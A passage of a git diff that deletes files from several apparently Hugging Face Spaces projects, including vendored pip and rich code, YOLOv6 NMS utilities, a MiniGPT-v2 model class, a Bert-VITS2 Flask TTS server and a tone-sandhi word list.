before passing to create(). - find_links = options.find_links or [] - - search_scope = SearchScope.create( - find_links=find_links, - index_urls=index_urls, - no_index=options.no_index, - ) - link_collector = LinkCollector( - session=session, - search_scope=search_scope, - ) - return link_collector - - @property - def find_links(self) -> List[str]: - return self.search_scope.find_links - - def fetch_response(self, location: Link) -> Optional[IndexContent]: - """ - Fetch an HTML page containing package links. - """ - return _get_index_content(location, session=self.session) - - def collect_sources( - self, - project_name: str, - candidates_from_page: CandidatesFromPage, - ) -> CollectedSources: - # The OrderedDict calls deduplicate sources by URL. 
- index_url_sources = collections.OrderedDict( - build_source( - loc, - candidates_from_page=candidates_from_page, - page_validator=self.session.is_secure_origin, - expand_dir=False, - cache_link_parsing=False, - ) - for loc in self.search_scope.get_index_urls_locations(project_name) - ).values() - find_links_sources = collections.OrderedDict( - build_source( - loc, - candidates_from_page=candidates_from_page, - page_validator=self.session.is_secure_origin, - expand_dir=True, - cache_link_parsing=True, - ) - for loc in self.find_links - ).values() - - if logger.isEnabledFor(logging.DEBUG): - lines = [ - f"* {s.link}" - for s in itertools.chain(find_links_sources, index_url_sources) - if s is not None and s.link is not None - ] - lines = [ - f"{len(lines)} location(s) to search " - f"for versions of {project_name}:" - ] + lines - logger.debug("\n".join(lines)) - - return CollectedSources( - find_links=list(find_links_sources), - index_urls=list(index_url_sources), - ) diff --git a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/_inspect.py b/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/_inspect.py deleted file mode 100644 index 30446ceb3f0235721e435f5fbd53f2e306f078cd..0000000000000000000000000000000000000000 --- a/spaces/TandCAcceptMe/face-swap-docker/mynewshinyroop/Lib/site-packages/pip/_vendor/rich/_inspect.py +++ /dev/null @@ -1,270 +0,0 @@ -from __future__ import absolute_import - -import inspect -from inspect import cleandoc, getdoc, getfile, isclass, ismodule, signature -from typing import Any, Collection, Iterable, Optional, Tuple, Type, Union - -from .console import Group, RenderableType -from .control import escape_control_codes -from .highlighter import ReprHighlighter -from .jupyter import JupyterMixin -from .panel import Panel -from .pretty import Pretty -from .table import Table -from .text import Text, TextType - - -def _first_paragraph(doc: str) -> str: - """Get the first paragraph from a docstring.""" - paragraph, _, _ = doc.partition("\n\n") - return paragraph - - -class Inspect(JupyterMixin): - """A renderable to inspect any Python Object. - - Args: - obj (Any): An object to inspect. - title (str, optional): Title to display over inspect result, or None use type. Defaults to None. - help (bool, optional): Show full help text rather than just first paragraph. Defaults to False. - methods (bool, optional): Enable inspection of callables. Defaults to False. - docs (bool, optional): Also render doc strings. Defaults to True. - private (bool, optional): Show private attributes (beginning with underscore). Defaults to False. - dunder (bool, optional): Show attributes starting with double underscore. Defaults to False. - sort (bool, optional): Sort attributes alphabetically. Defaults to True. - all (bool, optional): Show all attributes. Defaults to False. - value (bool, optional): Pretty print value of object. Defaults to True. 
- """ - - def __init__( - self, - obj: Any, - *, - title: Optional[TextType] = None, - help: bool = False, - methods: bool = False, - docs: bool = True, - private: bool = False, - dunder: bool = False, - sort: bool = True, - all: bool = True, - value: bool = True, - ) -> None: - self.highlighter = ReprHighlighter() - self.obj = obj - self.title = title or self._make_title(obj) - if all: - methods = private = dunder = True - self.help = help - self.methods = methods - self.docs = docs or help - self.private = private or dunder - self.dunder = dunder - self.sort = sort - self.value = value - - def _make_title(self, obj: Any) -> Text: - """Make a default title.""" - title_str = ( - str(obj) - if (isclass(obj) or callable(obj) or ismodule(obj)) - else str(type(obj)) - ) - title_text = self.highlighter(title_str) - return title_text - - def __rich__(self) -> Panel: - return Panel.fit( - Group(*self._render()), - title=self.title, - border_style="scope.border", - padding=(0, 1), - ) - - def _get_signature(self, name: str, obj: Any) -> Optional[Text]: - """Get a signature for a callable.""" - try: - _signature = str(signature(obj)) + ":" - except ValueError: - _signature = "(...)" - except TypeError: - return None - - source_filename: Optional[str] = None - try: - source_filename = getfile(obj) - except (OSError, TypeError): - # OSError is raised if obj has no source file, e.g. when defined in REPL. - pass - - callable_name = Text(name, style="inspect.callable") - if source_filename: - callable_name.stylize(f"link file://{source_filename}") - signature_text = self.highlighter(_signature) - - qualname = name or getattr(obj, "__qualname__", name) - - # If obj is a module, there may be classes (which are callable) to display - if inspect.isclass(obj): - prefix = "class" - elif inspect.iscoroutinefunction(obj): - prefix = "async def" - else: - prefix = "def" - - qual_signature = Text.assemble( - (f"{prefix} ", f"inspect.{prefix.replace(' ', '_')}"), - (qualname, "inspect.callable"), - signature_text, - ) - - return qual_signature - - def _render(self) -> Iterable[RenderableType]: - """Render object.""" - - def sort_items(item: Tuple[str, Any]) -> Tuple[bool, str]: - key, (_error, value) = item - return (callable(value), key.strip("_").lower()) - - def safe_getattr(attr_name: str) -> Tuple[Any, Any]: - """Get attribute or any exception.""" - try: - return (None, getattr(obj, attr_name)) - except Exception as error: - return (error, None) - - obj = self.obj - keys = dir(obj) - total_items = len(keys) - if not self.dunder: - keys = [key for key in keys if not key.startswith("__")] - if not self.private: - keys = [key for key in keys if not key.startswith("_")] - not_shown_count = total_items - len(keys) - items = [(key, safe_getattr(key)) for key in keys] - if self.sort: - items.sort(key=sort_items) - - items_table = Table.grid(padding=(0, 1), expand=False) - items_table.add_column(justify="right") - add_row = items_table.add_row - highlighter = self.highlighter - - if callable(obj): - signature = self._get_signature("", obj) - if signature is not None: - yield signature - yield "" - - if self.docs: - _doc = self._get_formatted_doc(obj) - if _doc is not None: - doc_text = Text(_doc, style="inspect.help") - doc_text = highlighter(doc_text) - yield doc_text - yield "" - - if self.value and not (isclass(obj) or callable(obj) or ismodule(obj)): - yield Panel( - Pretty(obj, indent_guides=True, max_length=10, max_string=60), - border_style="inspect.value.border", - ) - yield "" - - for key, (error, value) in 
items:
-            key_text = Text.assemble(
-                (
-                    key,
-                    "inspect.attr.dunder" if key.startswith("__") else "inspect.attr",
-                ),
-                (" =", "inspect.equals"),
-            )
-            if error is not None:
-                warning = key_text.copy()
-                warning.stylize("inspect.error")
-                add_row(warning, highlighter(repr(error)))
-                continue
-
-            if callable(value):
-                if not self.methods:
-                    continue
-
-                _signature_text = self._get_signature(key, value)
-                if _signature_text is None:
-                    add_row(key_text, Pretty(value, highlighter=highlighter))
-                else:
-                    if self.docs:
-                        docs = self._get_formatted_doc(value)
-                        if docs is not None:
-                            _signature_text.append("\n" if "\n" in docs else " ")
-                            doc = highlighter(docs)
-                            doc.stylize("inspect.doc")
-                            _signature_text.append(doc)
-
-                    add_row(key_text, _signature_text)
-            else:
-                add_row(key_text, Pretty(value, highlighter=highlighter))
-        if items_table.row_count:
-            yield items_table
-        elif not_shown_count:
-            yield Text.from_markup(
-                f"[b cyan]{not_shown_count}[/][i] attribute(s) not shown.[/i] "
-                f"Run [b][magenta]inspect[/]([not b]inspect[/])[/b] for options."
-            )
-
-    def _get_formatted_doc(self, object_: Any) -> Optional[str]:
-        """
-        Extract the docstring of an object, process it and return it.
-        The processing consists of cleaning up the docstring's indentation,
-        taking only its first paragraph if `self.help` is not True,
-        and escaping its control codes.
-
-        Args:
-            object_ (Any): the object to get the docstring from.
-
-        Returns:
-            Optional[str]: the processed docstring, or None if no docstring was found.
-        """
-        docs = getdoc(object_)
-        if docs is None:
-            return None
-        docs = cleandoc(docs).strip()
-        if not self.help:
-            docs = _first_paragraph(docs)
-        return escape_control_codes(docs)
-
-
-def get_object_types_mro(obj: Union[object, Type[Any]]) -> Tuple[type, ...]:
-    """Returns the MRO of an object's class, or of the object itself if it's a class."""
-    if not hasattr(obj, "__mro__"):
-        # N.B. we cannot use `if type(obj) is type` here because it doesn't work with
-        # some types of classes, such as the ones that use abc.ABCMeta.
-        obj = type(obj)
-    return getattr(obj, "__mro__", ())
-
-
-def get_object_types_mro_as_strings(obj: object) -> Collection[str]:
-    """
-    Returns the MRO of an object's class as fully qualified names, or of the object itself if it's a class.
-
-    Examples:
-        `object_types_mro_as_strings(JSONDecoder)` will return `['json.decoder.JSONDecoder', 'builtins.object']`
-    """
-    return [
-        f'{getattr(type_, "__module__", "")}.{getattr(type_, "__qualname__", "")}'
-        for type_ in get_object_types_mro(obj)
-    ]
-
-
-def is_object_one_of_types(
-    obj: object, fully_qualified_types_names: Collection[str]
-) -> bool:
-    """
-    Returns `True` if the given object's class (or the object itself, if it's a class) has one of the
-    fully qualified names in its MRO.
-    """
-    for type_name in get_object_types_mro_as_strings(obj):
-        if type_name in fully_qualified_types_names:
-            return True
-    return False
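The two MRO helpers above are designed to be used together: expand an object's class hierarchy into fully qualified names, then test that list against a set of candidate names. A minimal usage sketch, assuming only that the `rich` package is installed (its `rich._inspect` module ships the same two helpers shown here):

from json import JSONDecoder

# Sketch only: assumes `rich` is installed; these helpers live in rich._inspect.
from rich._inspect import get_object_types_mro_as_strings, is_object_one_of_types

decoder = JSONDecoder()
print(get_object_types_mro_as_strings(decoder))
# -> ['json.decoder.JSONDecoder', 'builtins.object']
print(is_object_one_of_types(decoder, {"json.decoder.JSONDecoder"}))
# -> True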
diff --git a/spaces/Theivaprakasham/yolov6/yolov6/utils/nms.py b/spaces/Theivaprakasham/yolov6/yolov6/utils/nms.py
deleted file mode 100644
index 9c61b7cc4567b03cd2977b505b89c76e0e1d6769..0000000000000000000000000000000000000000
--- a/spaces/Theivaprakasham/yolov6/yolov6/utils/nms.py
+++ /dev/null
@@ -1,106 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-# The code is based on
-# https://github.com/ultralytics/yolov5/blob/master/utils/general.py
-
-import os
-import time
-import numpy as np
-import cv2
-import torch
-import torchvision
-
-
-# Settings
-torch.set_printoptions(linewidth=320, precision=5, profile='long')
-np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format})  # format short g, %precision=5
-cv2.setNumThreads(0)  # prevent OpenCV from multithreading (incompatible with PyTorch DataLoader)
-os.environ['NUMEXPR_MAX_THREADS'] = str(min(os.cpu_count(), 8))  # NumExpr max threads
-
-
-def xywh2xyxy(x):
-    # Convert boxes with shape [n, 4] from [x, y, w, h] to [x1, y1, x2, y2] where x1y1 is top-left, x2y2=bottom-right
-    y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
-    y[:, 0] = x[:, 0] - x[:, 2] / 2  # top left x
-    y[:, 1] = x[:, 1] - x[:, 3] / 2  # top left y
-    y[:, 2] = x[:, 0] + x[:, 2] / 2  # bottom right x
-    y[:, 3] = x[:, 1] + x[:, 3] / 2  # bottom right y
-    return y
-
-
-def non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False, max_det=300):
-    """Runs Non-Maximum Suppression (NMS) on inference results.
-    This code is borrowed from: https://github.com/ultralytics/yolov5/blob/47233e1698b89fc437a4fb9463c815e9171be955/utils/general.py#L775
-    Args:
-        prediction: (tensor), with shape [N, 5 + num_classes], N is the number of bboxes.
-        conf_thres: (float) confidence threshold.
-        iou_thres: (float) iou threshold.
-        classes: (None or list[int]), if a list is provided, nms only keeps the classes you provide.
-        agnostic: (bool), when it is set to True, we do class-independent nms, otherwise, each class does nms separately.
-        multi_label: (bool), when it is set to True, one box can have multiple labels, otherwise, one box can only have one label.
-        max_det: (int), max number of output bboxes.
-
-    Returns:
-        list of detections, each item is one tensor with shape (num_boxes, 6), 6 is for [xyxy, conf, cls].
-    """
-
-    num_classes = prediction.shape[2] - 5  # number of classes
-    pred_candidates = prediction[..., 4] > conf_thres  # candidates
-
-    # Check the parameters.
-    assert 0 <= conf_thres <= 1, f'conf_thresh must be in 0.0 to 1.0, however {conf_thres} is provided.'
-    assert 0 <= iou_thres <= 1, f'iou_thres must be in 0.0 to 1.0, however {iou_thres} is provided.'
-
-    # Function settings.
-    max_wh = 4096  # maximum box width and height
-    max_nms = 30000  # maximum number of boxes put into torchvision.ops.nms()
-    time_limit = 10.0  # quit the function when NMS processing time exceeds this limit (seconds).
-    multi_label &= num_classes > 1  # multiple labels per box
-
-    tik = time.time()
-    output = [torch.zeros((0, 6), device=prediction.device)] * prediction.shape[0]
-    for img_idx, x in enumerate(prediction):  # image index, image inference
-        x = x[pred_candidates[img_idx]]  # confidence
-
-        # If no box remains, skip the next process.
- if not x.shape[0]: - continue - - # confidence multiply the objectness - x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf - - # (center x, center y, width, height) to (x1, y1, x2, y2) - box = xywh2xyxy(x[:, :4]) - - # Detections matrix's shape is (n,6), each row represents (xyxy, conf, cls) - if multi_label: - box_idx, class_idx = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T - x = torch.cat((box[box_idx], x[box_idx, class_idx + 5, None], class_idx[:, None].float()), 1) - else: # Only keep the class with highest scores. - conf, class_idx = x[:, 5:].max(1, keepdim=True) - x = torch.cat((box, conf, class_idx.float()), 1)[conf.view(-1) > conf_thres] - - # Filter by class, only keep boxes whose category is in classes. - if classes is not None: - x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)] - - # Check shape - num_box = x.shape[0] # number of boxes - if not num_box: # no boxes kept. - continue - elif num_box > max_nms: # excess max boxes' number. - x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence - - # Batched NMS - class_offset = x[:, 5:6] * (0 if agnostic else max_wh) # classes - boxes, scores = x[:, :4] + class_offset, x[:, 4] # boxes (offset by class), scores - keep_box_idx = torchvision.ops.nms(boxes, scores, iou_thres) # NMS - if keep_box_idx.shape[0] > max_det: # limit detections - keep_box_idx = keep_box_idx[:max_det] - - output[img_idx] = x[keep_box_idx] - if (time.time() - tik) > time_limit: - print(f'WARNING: NMS cost time exceed the limited {time_limit}s.') - break # time limit exceeded - - return output diff --git a/spaces/Vision-CAIR/MiniGPT-v2/minigpt4/models/minigpt_v2.py b/spaces/Vision-CAIR/MiniGPT-v2/minigpt4/models/minigpt_v2.py deleted file mode 100644 index a046b0baff41db50477e35904af9bcad5baa619c..0000000000000000000000000000000000000000 --- a/spaces/Vision-CAIR/MiniGPT-v2/minigpt4/models/minigpt_v2.py +++ /dev/null @@ -1,139 +0,0 @@ -import logging -import random - -import torch -from torch.cuda.amp import autocast as autocast -import torch.nn as nn - -from minigpt4.common.registry import registry -from minigpt4.models.base_model import disabled_train -from minigpt4.models.minigpt_base import MiniGPTBase -from minigpt4.models.Qformer import BertConfig, BertLMHeadModel - - -@registry.register_model("minigpt_v2") -class MiniGPTv2(MiniGPTBase): - """ - MiniGPT-v2 model - """ - - PRETRAINED_MODEL_CONFIG_DICT = { - "pretrain": "configs/models/minigpt_v2.yaml", - } - - def __init__( - self, - vit_model="eva_clip_g", - img_size=448, - drop_path_rate=0, - use_grad_checkpoint=False, - vit_precision="fp16", - freeze_vit=True, - llama_model="", - prompt_template='[INST] {} [/INST]', - max_txt_len=300, - end_sym='\n', - lora_r=64, - lora_target_modules=["q_proj", "v_proj"], - lora_alpha=16, - lora_dropout=0.05, - chat_template=False, - use_grad_checkpoint_llm=False, - max_context_len=3800, - low_resource=False, # use 8 bit and put vit in cpu - device_8bit=0, # the device of 8bit model should be set when loading and cannot be changed anymore. 
- ): - super().__init__( - vit_model=vit_model, - img_size=img_size, - drop_path_rate=drop_path_rate, - use_grad_checkpoint=use_grad_checkpoint, - vit_precision=vit_precision, - freeze_vit=freeze_vit, - llama_model=llama_model, - max_txt_len=max_txt_len, - max_context_len=max_context_len, - end_sym=end_sym, - prompt_template=prompt_template, - low_resource=low_resource, - device_8bit=device_8bit, - lora_r=lora_r, - lora_target_modules=lora_target_modules, - lora_alpha=lora_alpha, - lora_dropout=lora_dropout, - ) - - img_f_dim = self.visual_encoder.num_features * 4 - self.llama_proj = nn.Linear( - img_f_dim, self.llama_model.config.hidden_size - ) - self.chat_template = chat_template - - if use_grad_checkpoint_llm: - self.llama_model.gradient_checkpointing_enable() - - def encode_img(self, image): - device = image.device - - if len(image.shape) > 4: - image = image.reshape(-1, *image.shape[-3:]) - - with self.maybe_autocast(): - image_embeds = self.ln_vision(self.visual_encoder(image)).to(device) - image_embeds = image_embeds[:, 1:, :] - bs, pn, hs = image_embeds.shape - image_embeds = image_embeds.view(bs, int(pn / 4), int(hs * 4)) - - inputs_llama = self.llama_proj(image_embeds) - atts_llama = torch.ones(inputs_llama.size()[:-1], dtype=torch.long).to(image.device) - return inputs_llama, atts_llama - - @classmethod - def from_config(cls, cfg): - vit_model = cfg.get("vit_model", "eva_clip_g") - img_size = cfg.get("image_size") - llama_model = cfg.get("llama_model") - - drop_path_rate = cfg.get("drop_path_rate", 0) - use_grad_checkpoint = cfg.get("use_grad_checkpoint", False) - vit_precision = cfg.get("vit_precision", "fp16") - freeze_vit = cfg.get("freeze_vit", True) - low_resource = cfg.get("low_resource", False) - - prompt_template = cfg.get("prompt_template", '[INST] {} [/INST]') - max_txt_len = cfg.get("max_txt_len", 300) - end_sym = cfg.get("end_sym", '\n') - - lora_r = cfg.get("lora_r", 64) - lora_alpha = cfg.get("lora_alpha", 16) - chat_template = cfg.get("chat_template", False) - - use_grad_checkpoint_llm = cfg.get("use_grad_checkpoint_llm", False) - max_context_len = cfg.get("max_context_len", 3800) - - model = cls( - vit_model=vit_model, - img_size=img_size, - drop_path_rate=drop_path_rate, - use_grad_checkpoint=use_grad_checkpoint, - vit_precision=vit_precision, - freeze_vit=freeze_vit, - llama_model=llama_model, - prompt_template=prompt_template, - max_txt_len=max_txt_len, - low_resource=low_resource, - end_sym=end_sym, - lora_r=lora_r, - lora_alpha=lora_alpha, - chat_template=chat_template, - use_grad_checkpoint_llm=use_grad_checkpoint_llm, - max_context_len=max_context_len, - ) - - ckpt_path = cfg.get("ckpt", "") # load weights of MiniGPT-4 - if ckpt_path: - print("Load Minigpt-4-LLM Checkpoint: {}".format(ckpt_path)) - ckpt = torch.load(ckpt_path, map_location="cpu") - msg = model.load_state_dict(ckpt['model'], strict=False) - - return model diff --git a/spaces/Volkopat/SegmentAnythingxGroundingDINO/groundingdino/config/__init__.py b/spaces/Volkopat/SegmentAnythingxGroundingDINO/groundingdino/config/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/XiNiu/XSpace/README.md b/spaces/XiNiu/XSpace/README.md deleted file mode 100644 index 7c5b224c4956da4566e3a4591dc818ee556c0d5d..0000000000000000000000000000000000000000 --- a/spaces/XiNiu/XSpace/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: XSpace -emoji: ⚡ -colorFrom: green -colorTo: yellow -sdk: gradio -sdk_version: 3.35.2 
-app_file: app.py -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/XzJosh/Aatrox-Bert-VITS2/server.py b/spaces/XzJosh/Aatrox-Bert-VITS2/server.py deleted file mode 100644 index c736ca4f95fec853950eef6654ef79856beffc0a..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Aatrox-Bert-VITS2/server.py +++ /dev/null @@ -1,123 +0,0 @@ -from flask import Flask, request, Response -from io import BytesIO -import torch -from av import open as avopen - -import commons -import utils -from models import SynthesizerTrn -from text.symbols import symbols -from text import cleaned_text_to_sequence, get_bert -from text.cleaner import clean_text -from scipy.io import wavfile - -# Flask Init -app = Flask(__name__) -app.config['JSON_AS_ASCII'] = False -def get_text(text, language_str, hps): - norm_text, phone, tone, word2ph = clean_text(text, language_str) - print([f"{p}{t}" for p, t in zip(phone, tone)]) - phone, tone, language = cleaned_text_to_sequence(phone, tone, language_str) - - if hps.data.add_blank: - phone = commons.intersperse(phone, 0) - tone = commons.intersperse(tone, 0) - language = commons.intersperse(language, 0) - for i in range(len(word2ph)): - word2ph[i] = word2ph[i] * 2 - word2ph[0] += 1 - bert = get_bert(norm_text, word2ph, language_str) - - assert bert.shape[-1] == len(phone) - - phone = torch.LongTensor(phone) - tone = torch.LongTensor(tone) - language = torch.LongTensor(language) - - return bert, phone, tone, language - -def infer(text, sdp_ratio, noise_scale, noise_scale_w,length_scale,sid): - bert, phones, tones, lang_ids = get_text(text,"ZH", hps,) - with torch.no_grad(): - x_tst=phones.to(dev).unsqueeze(0) - tones=tones.to(dev).unsqueeze(0) - lang_ids=lang_ids.to(dev).unsqueeze(0) - bert = bert.to(dev).unsqueeze(0) - x_tst_lengths = torch.LongTensor([phones.size(0)]).to(dev) - speakers = torch.LongTensor([hps.data.spk2id[sid]]).to(dev) - audio = net_g.infer(x_tst, x_tst_lengths, speakers, tones, lang_ids,bert, sdp_ratio=sdp_ratio - , noise_scale=noise_scale, noise_scale_w=noise_scale_w, length_scale=length_scale)[0][0,0].data.cpu().float().numpy() - return audio - -def replace_punctuation(text, i=2): - punctuation = ",。?!" 
- for char in punctuation: - text = text.replace(char, char * i) - return text - -def wav2(i, o, format): - inp = avopen(i, 'rb') - out = avopen(o, 'wb', format=format) - if format == "ogg": format = "libvorbis" - - ostream = out.add_stream(format) - - for frame in inp.decode(audio=0): - for p in ostream.encode(frame): out.mux(p) - - for p in ostream.encode(None): out.mux(p) - - out.close() - inp.close() - -# Load Generator -hps = utils.get_hparams_from_file("./configs/config.json") - -dev='cuda' -net_g = SynthesizerTrn( - len(symbols), - hps.data.filter_length // 2 + 1, - hps.train.segment_size // hps.data.hop_length, - n_speakers=hps.data.n_speakers, - **hps.model).to(dev) -_ = net_g.eval() - -_ = utils.load_checkpoint("logs/G_649000.pth", net_g, None,skip_optimizer=True) - -@app.route("/",methods=['GET','POST']) -def main(): - if request.method == 'GET': - try: - speaker = request.args.get('speaker') - text = request.args.get('text').replace("/n","") - sdp_ratio = float(request.args.get("sdp_ratio", 0.2)) - noise = float(request.args.get("noise", 0.5)) - noisew = float(request.args.get("noisew", 0.6)) - length = float(request.args.get("length", 1.2)) - if length >= 2: - return "Too big length" - if len(text) >=200: - return "Too long text" - fmt = request.args.get("format", "wav") - if None in (speaker, text): - return "Missing Parameter" - if fmt not in ("mp3", "wav", "ogg"): - return "Invalid Format" - except: - return "Invalid Parameter" - - with torch.no_grad(): - audio = infer(text, sdp_ratio=sdp_ratio, noise_scale=noise, noise_scale_w=noisew, length_scale=length, sid=speaker) - - with BytesIO() as wav: - wavfile.write(wav, hps.data.sampling_rate, audio) - torch.cuda.empty_cache() - if fmt == "wav": - return Response(wav.getvalue(), mimetype="audio/wav") - wav.seek(0, 0) - with BytesIO() as ofp: - wav2(wav, ofp, fmt) - return Response( - ofp.getvalue(), - mimetype="audio/mpeg" if fmt == "mp3" else "audio/ogg" - ) diff --git a/spaces/XzJosh/Azusa-Bert-VITS2/commons.py b/spaces/XzJosh/Azusa-Bert-VITS2/commons.py deleted file mode 100644 index 9ad0444b61cbadaa388619986c2889c707d873ce..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Azusa-Bert-VITS2/commons.py +++ /dev/null @@ -1,161 +0,0 @@ -import math -import numpy as np -import torch -from torch import nn -from torch.nn import functional as F - - -def init_weights(m, mean=0.0, std=0.01): - classname = m.__class__.__name__ - if classname.find("Conv") != -1: - m.weight.data.normal_(mean, std) - - -def get_padding(kernel_size, dilation=1): - return int((kernel_size*dilation - dilation)/2) - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def intersperse(lst, item): - result = [item] * (len(lst) * 2 + 1) - result[1::2] = lst - return result - - -def kl_divergence(m_p, logs_p, m_q, logs_q): - """KL(P||Q)""" - kl = (logs_q - logs_p) - 0.5 - kl += 0.5 * (torch.exp(2. * logs_p) + ((m_p - m_q)**2)) * torch.exp(-2. 
* logs_q) - return kl - - -def rand_gumbel(shape): - """Sample from the Gumbel distribution, protect from overflows.""" - uniform_samples = torch.rand(shape) * 0.99998 + 0.00001 - return -torch.log(-torch.log(uniform_samples)) - - -def rand_gumbel_like(x): - g = rand_gumbel(x.size()).to(dtype=x.dtype, device=x.device) - return g - - -def slice_segments(x, ids_str, segment_size=4): - ret = torch.zeros_like(x[:, :, :segment_size]) - for i in range(x.size(0)): - idx_str = ids_str[i] - idx_end = idx_str + segment_size - ret[i] = x[i, :, idx_str:idx_end] - return ret - - -def rand_slice_segments(x, x_lengths=None, segment_size=4): - b, d, t = x.size() - if x_lengths is None: - x_lengths = t - ids_str_max = x_lengths - segment_size + 1 - ids_str = (torch.rand([b]).to(device=x.device) * ids_str_max).to(dtype=torch.long) - ret = slice_segments(x, ids_str, segment_size) - return ret, ids_str - - -def get_timing_signal_1d( - length, channels, min_timescale=1.0, max_timescale=1.0e4): - position = torch.arange(length, dtype=torch.float) - num_timescales = channels // 2 - log_timescale_increment = ( - math.log(float(max_timescale) / float(min_timescale)) / - (num_timescales - 1)) - inv_timescales = min_timescale * torch.exp( - torch.arange(num_timescales, dtype=torch.float) * -log_timescale_increment) - scaled_time = position.unsqueeze(0) * inv_timescales.unsqueeze(1) - signal = torch.cat([torch.sin(scaled_time), torch.cos(scaled_time)], 0) - signal = F.pad(signal, [0, 0, 0, channels % 2]) - signal = signal.view(1, channels, length) - return signal - - -def add_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return x + signal.to(dtype=x.dtype, device=x.device) - - -def cat_timing_signal_1d(x, min_timescale=1.0, max_timescale=1.0e4, axis=1): - b, channels, length = x.size() - signal = get_timing_signal_1d(length, channels, min_timescale, max_timescale) - return torch.cat([x, signal.to(dtype=x.dtype, device=x.device)], axis) - - -def subsequent_mask(length): - mask = torch.tril(torch.ones(length, length)).unsqueeze(0).unsqueeze(0) - return mask - - -@torch.jit.script -def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels): - n_channels_int = n_channels[0] - in_act = input_a + input_b - t_act = torch.tanh(in_act[:, :n_channels_int, :]) - s_act = torch.sigmoid(in_act[:, n_channels_int:, :]) - acts = t_act * s_act - return acts - - -def convert_pad_shape(pad_shape): - l = pad_shape[::-1] - pad_shape = [item for sublist in l for item in sublist] - return pad_shape - - -def shift_1d(x): - x = F.pad(x, convert_pad_shape([[0, 0], [0, 0], [1, 0]]))[:, :, :-1] - return x - - -def sequence_mask(length, max_length=None): - if max_length is None: - max_length = length.max() - x = torch.arange(max_length, dtype=length.dtype, device=length.device) - return x.unsqueeze(0) < length.unsqueeze(1) - - -def generate_path(duration, mask): - """ - duration: [b, 1, t_x] - mask: [b, 1, t_y, t_x] - """ - device = duration.device - - b, _, t_y, t_x = mask.shape - cum_duration = torch.cumsum(duration, -1) - - cum_duration_flat = cum_duration.view(b * t_x) - path = sequence_mask(cum_duration_flat, t_y).to(mask.dtype) - path = path.view(b, t_x, t_y) - path = path - F.pad(path, convert_pad_shape([[0, 0], [1, 0], [0, 0]]))[:, :-1] - path = path.unsqueeze(1).transpose(2,3) * mask - return path - - -def clip_grad_value_(parameters, clip_value, norm_type=2): - if isinstance(parameters, torch.Tensor): 
- parameters = [parameters] - parameters = list(filter(lambda p: p.grad is not None, parameters)) - norm_type = float(norm_type) - if clip_value is not None: - clip_value = float(clip_value) - - total_norm = 0 - for p in parameters: - param_norm = p.grad.data.norm(norm_type) - total_norm += param_norm.item() ** norm_type - if clip_value is not None: - p.grad.data.clamp_(min=-clip_value, max=clip_value) - total_norm = total_norm ** (1. / norm_type) - return total_norm diff --git a/spaces/XzJosh/Diana-Bert-VITS2/text/tone_sandhi.py b/spaces/XzJosh/Diana-Bert-VITS2/text/tone_sandhi.py deleted file mode 100644 index 0f45b7a72c5d858bcaab19ac85cfa686bf9a74da..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Diana-Bert-VITS2/text/tone_sandhi.py +++ /dev/null @@ -1,351 +0,0 @@ -# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -from typing import List -from typing import Tuple - -import jieba -from pypinyin import lazy_pinyin -from pypinyin import Style - - -class ToneSandhi(): - def __init__(self): - self.must_neural_tone_words = { - '麻烦', '麻利', '鸳鸯', '高粱', '骨头', '骆驼', '马虎', '首饰', '馒头', '馄饨', '风筝', - '难为', '队伍', '阔气', '闺女', '门道', '锄头', '铺盖', '铃铛', '铁匠', '钥匙', '里脊', - '里头', '部分', '那么', '道士', '造化', '迷糊', '连累', '这么', '这个', '运气', '过去', - '软和', '转悠', '踏实', '跳蚤', '跟头', '趔趄', '财主', '豆腐', '讲究', '记性', '记号', - '认识', '规矩', '见识', '裁缝', '补丁', '衣裳', '衣服', '衙门', '街坊', '行李', '行当', - '蛤蟆', '蘑菇', '薄荷', '葫芦', '葡萄', '萝卜', '荸荠', '苗条', '苗头', '苍蝇', '芝麻', - '舒服', '舒坦', '舌头', '自在', '膏药', '脾气', '脑袋', '脊梁', '能耐', '胳膊', '胭脂', - '胡萝', '胡琴', '胡同', '聪明', '耽误', '耽搁', '耷拉', '耳朵', '老爷', '老实', '老婆', - '老头', '老太', '翻腾', '罗嗦', '罐头', '编辑', '结实', '红火', '累赘', '糨糊', '糊涂', - '精神', '粮食', '簸箕', '篱笆', '算计', '算盘', '答应', '笤帚', '笑语', '笑话', '窟窿', - '窝囊', '窗户', '稳当', '稀罕', '称呼', '秧歌', '秀气', '秀才', '福气', '祖宗', '砚台', - '码头', '石榴', '石头', '石匠', '知识', '眼睛', '眯缝', '眨巴', '眉毛', '相声', '盘算', - '白净', '痢疾', '痛快', '疟疾', '疙瘩', 